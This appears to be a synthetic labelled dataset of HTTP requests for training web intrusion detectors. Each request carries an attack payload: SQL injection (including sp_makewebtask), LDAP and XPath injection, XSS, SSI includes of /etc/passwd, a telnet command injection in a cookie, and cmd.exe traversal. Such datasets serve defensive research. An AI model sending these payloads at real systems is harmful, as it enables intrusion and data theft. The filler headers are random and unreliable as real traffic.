Connection: keep-alive
Accept: text/html, audio/x-wav, application/*
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-turkish
Accept-Encoding: deflate, deflate, deflate, deflate;q=0.4
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 102.236.20.245
Cookie: 4ta7oC=0
Cookie2: $Version="142"
Date: Thu, 08 Dec 05 14:26:04 CET
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: atrc@mosrloac8i.net
If-Modified-Since: Thu, 30 Oct 08 03:26:49 CET
If-Unmodified-Since: Fri, 14 Nov 08 23:34:28 CET
If-Match: *
If-None-Match: "IheMbF3LNsKGBgDKGYDh"
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 691
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM ZmxlaU5BM2V0cnJ1YW1vY210aWV0cnRRb3J6c250bm95dFZhVGhjaHU=
Range: 80-60466,-60,-277
Referer: http://7hn2.cz/heeese6/s6TssxkN/anse1e/rdtEe.pdf
TE: trailers,deflate;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 1.6; on-nI; rv:4.7.0) Gecko/70283999
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: lben/7.2 www.u9eaCh.tiff:22602
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47176
Start - Id: 41854
class: SqlInjection
GET /4dRrssi/leiogoatbhsGynnaioe/qnoeiivuol8sq/esewseeeEaraaeyvte/yZhxC2yyVPhBhOGthbVQ/lNdarurymQ0ee.jpg?ovemtu=%27++union+select+++%40%40version%2C1%2C1%2C1-- HTTP/1.1
Host: 158.170.148.183
Connection: slo3yfi
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.2
Accept-Language: e7Uipe-nitwypA1;q=0.0, wtTki-aiyumsEh
Cache-Control: no-store
Client-ip: 78.57.136.131
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="555"
Date: Wed, 02 Nov 05 22:25:38 UTC
ETag: "a2V9IycN6MWKRF29Nv"
Expect: rpih
From: dupNd@t1Lces4e.com
If-Modified-Since: Sun, 02 Nov 08 11:10:20 GMT
If-Unmodified-Since: Mon, 01 Sep 08 01:35:42 CET
If-Match: "VQVeGkDlKDiHB_Xu"
If-None-Match: *
If-Range: Thu, 18 May 06 24:27:09 CET
Max-Forwards: 77
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: xnD4ee qpwiaF=eesD
Authorization: NTLM dGpiYXNkcHJhZVQ2YXRveW85ZHBzaXVsYmhKbm5jMWl0aWVabWVwbg==
Range: -521,-331719
Referer: http://iifeeaic.ch/uaAyuei/SiUSiS/fNms/rcsekt50.pl
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: Mozilla/8.4 (compatible; Konqueror/1.8; Solaris; Azesta72he; 6c85nyrx; Stne)
UA-CPU: PowerPC
UA-Disp: 7520,1896,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: deflate
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 207.107.185.169
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41854
Start - Id: 37968
class: LdapInjection
GET /4urcprSZywrXD5l/e6UAPg.fNNsB/DUDlibSrmq-hm@7cpK/aY7/_opt-/eepezitws3Eros/eEf3e23DIC2A/lie9jkHnueaomsmdt.asmx?UsNue1s5=1paue%5D%25iac%27aiixtermbody&SF.3opttdmsosG=p8j&htpass40r7rcpY8p6=14711779&niTkae94rksRoqd=%29+%28+%7C++++%28++++cn%3D*o%27brien*++%29%28mail%3D*o+++%27brien*+%29++&4as=i&Ir4aN7f1Z5=jicE&agcfi8v2egnir=01&7eR2k=aNWPf&J1passthruTRlssXTQ=9eo%3Fen1%5Bxbetween+tx&lchaie3=uexAnse%7C%3B%26%7C0a+ HTTP/1.1
Host: 197.111.16.51
Connection: keep-alive
Accept: audio/basic, text/html;q=0.7
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: compress;q=0.3, gzip, deflate;q=0.7, gzip;q=0.8, identity;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.204.117.84
Cookie: ifeealea7nnR=stylee
Cookie2: $Version="030"
Date: Wed, 29 Aug 07 19:44:43 UTC
ETag: "m2AYknT5WHdsd0y1Ijx"
Expect: 100-continue
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Wed, 27 Feb 08 04:17:54 CET
If-Unmodified-Since: Thu, 26 Jun 08 16:16:04 CET
If-Match: "S5oSgYbyA8T8uQ7t.Md"
If-None-Match: *
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 6
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM MmFuZXR0OGVpcmNvZWlhc3JzcjNhaGxoQ21XYW90b3NUcm1lbGR2YXMwbw==
Range: -8,482604-
Referer: http://ebreo.fr/3euln/1bVinoY/esOdsaet/gsoox/r2bsr.exe
TE: deflate;q=0.8,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/9.7 (X11; U; Solaris 0.6; Ct-is; rv:8.3.6) Gecko/50705766
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.3 125.101.210.132
Transfer-Encoding: identity
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37968
Start - Id: 47635
class: XSS
GET /jOnChW/1oOFrYv7vsIw1Y/gn9eS8h0dfrisets/nksuoOaLds0Uv/rmT/3ers64anYOd/rmysbl/eopI@KDmUNi881ZEBNuO/MAsmbdedesoo8xnsoTsa/0kmE/iwKq6tALc.tiff?rdcek=1608&enPgnaesdsteau=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Balert++%28%27NoNsT%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&iiRtoetzo=spieint5a&eliodaRto6mn=77094 HTTP/1.0
Host: www.h3ekhdere.org
Connection: close
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312;q=0.3, macintosh, iso-8859-15;q=0.6, windows-1252;q=0.4, iso-8859-4;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: t79sc-i;q=0.5, 8hue-end;q=0.5, ee-ahre4da;q=0.3, y-sRiEe4;q=0.6
Cache-Control: no-store
Client-ip: 208.225.246.243
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="186"
Date: Mon, 03 May 10 24:51:55 UTC
ETag: W/"vCJ4ze41NxoBsap4"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Sat, 08 Nov 08 13:16:02 UTC
If-Unmodified-Since: Wed, 15 Sep 04 22:00:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8183
MIME-Version: 4.1
Pragma: ibnard='halerint'
Proxy-Authorization: NTLM cmF0YUUybGlvcmNSTGNjZDk2ZWhhcWpldG85bzFhZWV0YWttdGxvcg==
Authorization: Basic ZTV0V2ZudGI6YmFoeXBkdHQ=
Range: 51-,059585-
Referer: http://ownow7n.be/zir7Uf/Mr5w/demefi/nhjiwu/ErbisdSi.sh
TE: trailers,deflate;q=0.3,trailers
Trailer: Warning
User-Agent: nfyanraLna/9.8
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: HTTP/1.6 22.150.222.205, HTTP/4.1 189.138.195.88:672
Transfer-Encoding: gzip
Upgrade: euleee/5.6, eNo/6.5, estIph/1.3
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47635
Start - Id: 49168
class: XPathInjection
GET /oranmoxremc3d6rrQ/Tinvd4nrbRkesodt/lFFLbX@3MMu0-@QI.php4?05wn=44&Tlawo=onerncedwdfat&07jsix6kvYooTi=Ehenhvja%27+++or+++++dseJ%2Ftn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or+++%273ha6sa4s%27++++%3D++++%27&eocnEt=rtm%3B&3pZA23l_d@echo=s&taYllvtd=iesobjectN%3D-te&eonkh=059&eeRllwhd=6338625 HTTP/1.0
Host: www.reamlI.de
Connection: keep-alive
Accept: image/png;q=0.5, audio/*;q=0.2, application/*;q=0.3
Accept-Charset: gb2312;q=0.5, x-mac-japanese, iso-8859-1
Accept-Encoding: 
Accept-Language: j-vgielmd;q=0.3
Cache-Control: only-if-cached
Client-ip: 38.175.250.11
Cookie: 7SIANhomeyMnnconnectc=ofBa_JAGxWT1;9yktb=r=k5;oir=oLNvE;yitw3tItesAs=tcnHe8eATi;nkgnbobielja=vNeutu yha9 iws;e2tIr4nraictd9p=5eonC
Cookie2: $Version="2"
Date: Mon, 16 Apr 07 13:26:16 GMT
ETag: W/"VjavY-udlIsPEF8K8Bw"
Expect: enssl=tort;giHeab=zaoEd
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Tue, 15 Apr 08 10:47:56 UTC
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: "H9vWD9Kik2SOFnZ8qk"
Max-Forwards: 76
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic c3lscWhuZTpzbzdp
Range: -441207,31726-,-3
Referer: /etsfD/pnalnog/wsHt/sgies.zip
TE: trailers,trailers,deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/5.3 (X11; U; Unix 6.7; ia-to; rv:8.4.3) Gecko/63682749
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: 9.4 www.twQntldn.gif
Transfer-Encoding: compress
Upgrade: rum/1.2, bcstu/1.3, zidTat/2.5, dAck5/6.8, hAes/0.3
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 887943993
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49168
Start - Id: 35339
class: SqlInjection
GET /eeoA2L/2aPjV-MrvNDfe4B_/naVG5LV/ee1g.php4?Tvl=OR+++++932%3D932&rTatrnue6Mro1o=eakekhOor9Tx4es&lhe9crCeOd=eeyodt3 HTTP/1.0
Host: www.rLRsC.net
Connection: eoung
Accept: audio/basic;q=0.8, text/*;q=0.4
Accept-Charset: iso-8859-4;q=0.0, windows-1252
Accept-Encoding: identity;q=0.1, gzip;q=0.9, deflate;q=0.7, identity, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="9"
Date: Sun, 20 Apr 08 03:02:09 CET
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Thu, 13 Aug 09 07:14:53 UTC
If-Unmodified-Since: Sun, 15 Nov 09 12:13:24 CET
If-Match: *
If-None-Match: *
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: 9m1G irNrna=auC77ta
Authorization: Digest qop=auth-int
Range: 16442-228208
Referer: http://www.Otoeotgp.be/saRs/tllo/cnerr/hpa8/eearArwa.mdb
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/2.0 (X11; U; Linux i386 1.5; Dg-ac; rv:1.1.4) Gecko/44888766
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 5.1 163.38.67.127, HTTP/8.7 www.1rwi.shtml, HTTP/7.1 www.tdrdo24t.jpg
Transfer-Encoding: compress
Upgrade: ohz/1.8
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 184.200.150.46
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35339
Start - Id: 43658
class: OsCommanding
PUT /b5VWTQXZfU4/s66onohnffnsbtl/amIT/4oseuAwwie.bin? HTTP/1.1
Content-Length: 59
Content-Language: menr,isiiott
Content-Encoding: compress
Content-MD5: ZmFlSGxvaW5GZWVjaGlubg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Oct 05 17:29:52 GMT
Host: www.rhxhS0s.uk
Connection: n0as
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: inHaet2-nnar;q=0.2, xuRe-OnonE;q=0.8, yni-doei, mt1-e;q=0.9
Cache-Control: min-fresh=308
Cookie: ucdrnnoClRseoe="   ;     telnet 146.148.112.58     80;;ojrhfeh6ft6edeu=bepe;hswRe5lO9m=413507
Date: Sat, 26 Jul 08 18:00:35 GMT
ETag: "BC.vUwvhkF90TIx4"
If-Modified-Since: Wed, 16 Sep 09 08:13:50 UTC
If-Match: "wSDAxjIpNdTU7fVBAfV7"
Max-Forwards: 6
Referer: http://www.4rj1.org/oc3m/ntsp.shtml
TE: gzip;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/0.4 (X11; U; Open BSD i586 3.8; sr-gt; rv:7.4.2) Gecko/81095745

Me84w=pmEs&eradcheieeedai=aac&c5si=cavy&to9eYecei8s5t4=9045

End - Id: 43658
Start - Id: 39597
class: SSI
GET /O6telnettG8it8lb/sjntr/oteeilneeR4/eleor/pcOneth/cBIojtQ7IJJe40rws/k1atnRr8Grlogoot/ilocationFb9yrTXJ.jpg?VYinl7kKD5g=tmpib%3B%2Bphpccatt%27re%286&lumihL=%3C%21--++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&einntItmBeet=j6iks1aprah HTTP/1.0
Host: www.grtorats4.be:80
Connection: hatatp
Accept: image/png
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: llr-atyddeed, ntd-as;q=0.1, tehm-YfmVfo, dszPnlov-Itw
Cache-Control: min-fresh=55
Client-ip: 239.19.170.214
Cookie: dovdoiht8Ee=fSriAntb3rdee;oes6ur=ople61;tiSe=)as;evMpnepkrP=413eetenithrbast;ainri7ti8op7e=mwhere
Cookie2: $Version="7"
Date: Sat, 31 Jan 09 17:42:38 CET
ETag: W/"oVLo4-iYAWfQ2T33"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 06 Dec 07 03:52:15 UTC
If-Unmodified-Since: Wed, 20 Jun 07 03:52:11 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Apr 05 20:03:53 CET
Max-Forwards: 5235
MIME-Version: 2.2
Pragma: sie=iocfmnJ
Proxy-Authorization: NTLM c3B4Yml0cGFpaWk0YmVscWVpU2h0ZWRybGE3ZWluc3NlamlqbjZkb2Nq
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: http://mapOeEa.cz/sqeft/rlntrsss/0ait/39h0erih/a44ew.jpeg
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: rnkn1_Q1 http://www.fr0nb.com
UA-Disp: 7073,179,8
UA-OS: Win9x
Via: 5.4 www.sery2na.shtml, tnrak/6.5 135.93.162.126, FTP/6.5 www.Oqc5x8uc.gif
Transfer-Encoding: kxti3; maloroes=sshdth
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 019 25.148.254.113 "snoelHUSeyhawd" 
X-Forwarded-For: 216.187.237.43
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39597
Start - Id: 39097
class: LdapInjection
PUT /c.U4dOXNy9CUi/andJf9/ip2thatlolelsfmdalt/a0snbs4aqTyhulokeers/f-O1bcwpDm@7SftwweY/njHGebwtaswcaoiTiee/rzn/eiM/a4eett/e1rtndaltrdoA/yP.php3? HTTP/1.1
Content-Length: 295
Content-Language: h2saa
Content-Encoding: gzip
Content-Location: http://rob8f.st/thbbdu/mmewE7Nf.gz
Content-MD5: eWVsb0V1bmVpb2RvZVdlVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 07:41:43 UTC
Last-Modified: Thu, 26 Jul 07 23:01:39 UTC
Host: 111.4.155.248
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: n-y, ehtog-oscYwrO, h-uteMo;q=0.2, Retfof-eoia;q=0.7
Cache-Control: no-cache
Client-ip: 2.238.234.36
Cookie: bVmochaY1=5948217;j629yj=)    (    | (displayName=had*)    (name   =   had*    )( mail=had*);NfVX=4132;seg5lSoiyars=i&r/;enmEsc7ySvtaon5=x4ta
Cookie2: $Version="58"
Date: Fri, 06 Apr 07 17:36:21 UTC
ETag: "76jYw1VLYeCoDQUJoQU"
Expect: h5vh=mjattny
If-Modified-Since: Fri, 29 May 09 08:52:00 GMT
If-Unmodified-Since: Fri, 03 Aug 07 17:08:59 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Dec 09 20:12:28 UTC
Max-Forwards: 4
Pragma: xt5niqin=7hn0a
Proxy-Authorization: krdaen zRoi=91qehep
Authorization: NTLM ZWhvaXBlM3Buc2lvdHR2YXVybjFhMGlsOWVybml6MTB0aWp0bm53bGhtYmhDb3lp
Range: -3,502-
Referer: /bestHkh/ishhs.avi
TE: deflate;q=0.2
Trailer: Trailer
User-Agent: eTfjzxD http://www.gtg4waa.net
UA-CPU: Sparc
UA-Disp: 339,2747,16
UA-Color: color32
UA-Pixels: 7038x1145
Via: bMSh/2.1 110.247.188.255, 4.0 139.150.73.102
Transfer-Encoding: identity
Upgrade: 7eeKe/5.6, Suar/6.3
Warning: 156 www.anuenrdb.jpg "stUa8h3rlELwts" 
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 310798442900
----: ---------------------
~~~~~: ~~~~~~~~~~

Tacd9Tdmh3tg6n=sNsm&shvyouz5f=v&Ti6Un6=edncos6eudhomesi+&r7ih6y= catoi ch&ce=n7LmxVK&Sswg8yoeid9i=9691186&8fs=iLi&aajste=  h%uans-tn-ft&bzirohtdhodreo=4643764&MservicesincludeeY1Pd0g=rGOZV&1ioqu4RE=80&YucqeuYEsilih=oy.D_tRk@W&eaYveewoifst5te=91&pcsNfjzhil=916&wueEaYtmpqAEWb=httpopenoopeng

End - Id: 39097
Start - Id: 40640
class: SSI
GET /daAnoeqzetIaha88sgrh/asiv@Z6PldUA2Vqm/Cnnes8pnt7/yC1zMkV/ef/monretti2est3xnejn/qptR0tteabw/hvd8arj/eahehbo/uhJlaaEH.js?O9OnwUt=siee&bunaA3N8=tNi+haeO%25gntt&tgraVicpfGsiev=375&e5slcrMo=omteijDyeuheindra&m4Wrnekhog3a=610209&6tEynsoanmas=hnjh&ktasitp5cje=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&I9ftp@pJYZcB=shaand0qoD&ieG06Oz=tuHo%3Bdn5ztp&tbogo017cO=%26lr&Eeiow=ftptdbttie0k6&iaee3mr=thbnkupwp-taton&e8fltnLafw=DauMLYdto&YtcmdxzVUjk7s=Ri0i HTTP/1.1
Host: www.dtg3uvsf.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress
Accept-Language: o-vc, rItwsN-is, maf-iUz
Cache-Control: min-fresh=254
Client-ip: 134.128.236.221
Cookie: 6thpee1nei=gKV1Ya7z;pa=r>ii0tewr;retalnaf4bn=l(/E(r4rmq=1];ewibsseauyye=]dfct(de
Cookie2: $Version="709"
Date: Mon, 04 Dec 06 21:22:03 GMT
ETag: "-s_wqRBhPXwnF0CQ"
Expect: faesi3c
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Mon, 20 Nov 06 18:00:54 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jun 07 05:26:01 UTC
Max-Forwards: 1590
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: juft neyufee=gACne
Range: 026791-2
Referer: http://ctonE.net/h1Vd/esrq2er.exe
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/3.6 (X11; U; Open BSD i586 6.0; nx-et; rv:9.2.1) Gecko/53567423
UA-CPU: x86
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: HTTP/5.2 www.peaphy.css
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 799 245.96.63.176 "ln3reeOsrhu8a" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40640
Start - Id: 41090
class: SqlInjection
GET /aakeoTh/gses6T3asokndeuPm/e2EzGR/thanrab62d/0includeuWq/cqgDeA3rjt1t/o3_R/aM@.asp?tirlegg=sv&ftonnYttgu=0x&6eieaehiosfn=varr2&r1u=9214&d5n=ds7L0d&wcor8ytlfoooab=hgAL&ESn=a1ZW1qOr&abl4=9&qetoitibm=%27%3B++++EXEC+master.dbo.sp_makewebtask+%27c%3A%5Cinetpub%5Cwwwroot%5Cdj.htm%27%2C+++++%27SELECT++elh1++++FROM+++ah6r5+++++WHERE+xtype%3D%27%27U%27%27%27&oT=8196&hr=28&th3f0nea4dom5hH=eqZ HTTP/1.0
Host: www.n2ta.uk:878
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: macintosh, euc-cn, x-mac-ce
Accept-Encoding: *;q=0.2
Accept-Language: a-enh, otEsh-t, etob-ir8s8
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="54"
Date: Wed, 07 Apr 10 06:35:06 GMT
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Tue, 16 Jan 07 20:16:38 GMT
If-Unmodified-Since: Wed, 19 Oct 05 07:43:59 CET
If-Match: *
If-None-Match: "P72PtUz1UrLbSy6"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://www.tratt.it/m7rtwu.jsp
TE: trailers,chunked;q=0.4
Trailer: From
User-Agent: tfea/3.4.0.6
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: identity
Upgrade: tuems/4.8, nyAo/8.5, ytngoe/0.7, sai/1.7, 0eeagy/5.6
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41090
Start - Id: 42320
class: SqlInjection
GET /ofntocret0or6a/hkphctst1nano/p@Ol/tHuKSvDC/gdsndrtlt4siim5ehs.jpg?trrma=%27+AND+++++USER_NAME%28%29%3D%27ptmyrK&liddoyupicihk=%5Dialo HTTP/1.1
Host: www.beskd.com
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: rptsoa-wh, ad-qwx;q=0.5, ioeiimrp-3aazlen;q=0.9, ie-etf19td;q=0.3, a-bJexTEhf
Cache-Control: no-cache
Client-ip: 64.206.153.107
Cookie: nbliz=dfYP0hgN-H;hmsqgojrs=diR6We.csBiW;loddsVso=ja6;2oe4orSgnmr6eh=08;yH6zmiRukysscm=48047537
Cookie2: $Version="97"
Date: Fri, 23 Jan 09 15:33:22 CET
ETag: "TofU@QbCUF13A_Qc"
Expect: rlstreu=Tpet8sAn
From: vtsibh@nsti.biz
If-Modified-Since: Sun, 28 Oct 07 03:27:22 CET
If-Unmodified-Since: Thu, 20 Apr 06 23:04:26 CET
If-Match: *
If-None-Match: *
If-Range: "34tX5k06-tS.PcRqB"
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -36
Referer: /tyoe3/nde4ys5/is9nuv.aspx
TE: trailers,deflate;q=0.8,trailers
Trailer: If-Match
User-Agent: pmlneedmq (seXe68O8SX; 2Gjm0pWgc; asvNzD_zY)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 9.6 226.125.32.118:56
Transfer-Encoding: gzip
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42320
Start - Id: 36571
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.zmEt.net
Connection: keep-alive
Accept: text/html, audio/basic
Accept-Charset: windows-1251;q=0.7, iso-8859-15, windows-1257;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: na5-IsSr;q=0.9, i-acoaeKz, xet-Rducge, meliNe-aisaieD
Cache-Control: ae6mn3=etmtsbt
Client-ip: 255.76.112.78
Cookie: h6=l=\
Cookie2: $Version="139"
Date: Mon, 27 Jul 09 18:37:22 UTC
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: t4lai=ttegsbtg;8sil
From: osNAoh@aHn2nry.de
If-Modified-Since: Wed, 09 Apr 08 01:39:46 CET
If-Unmodified-Since: Sat, 06 Jun 09 15:46:16 GMT
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: *
If-Range: Sat, 18 Oct 08 14:32:26 UTC
Max-Forwards: 6498
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tcpfic reesTpr=hh3orhdh
Range: -961935,910376-
Referer: /2xenshkz.bin
TE: trailers,gzip;q=0.4,gzip
Trailer: If-Match
User-Agent: Mozilla/9.2 (X11; U; Linux i586 2.0; l2-ol; rv:0.0.5) Gecko/25370554
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 529x915
Via: FTP/6.9 www.iodn.jpeg:866, 0.4 www.scCgn.jpg, 7.8 128.65.84.117
Transfer-Encoding: compress
Upgrade: t2w5X/9.8
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36571
Start - Id: 35421
class: SqlInjection
GET /z6KB8dgYhjDjY/7R0hxxI4Cpv1smv-85G/dkJzT@an/c1l_f/noenorhpmetdeuig.htm?geiaowBjdbe=%27+++++OR++%27nturb%27++BETWEEN+++++%27R%27++AND+++++%27T HTTP/1.1
Host: www.cwsh.gov
Connection: keep-alive
Accept: text/xml;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Cookie: eleenitbg=ue
Date: Sat, 04 Sep 04 20:41:34 GMT
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: edzd=keea
If-Modified-Since: Fri, 26 Dec 08 19:50:33 GMT
If-Match: "PYwkduxR3xQ6IRotd-C"
If-None-Match: "-M-mg2EWbeB@TUE7br@2"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 450
MIME-Version: 3.1
Pragma: no-cache
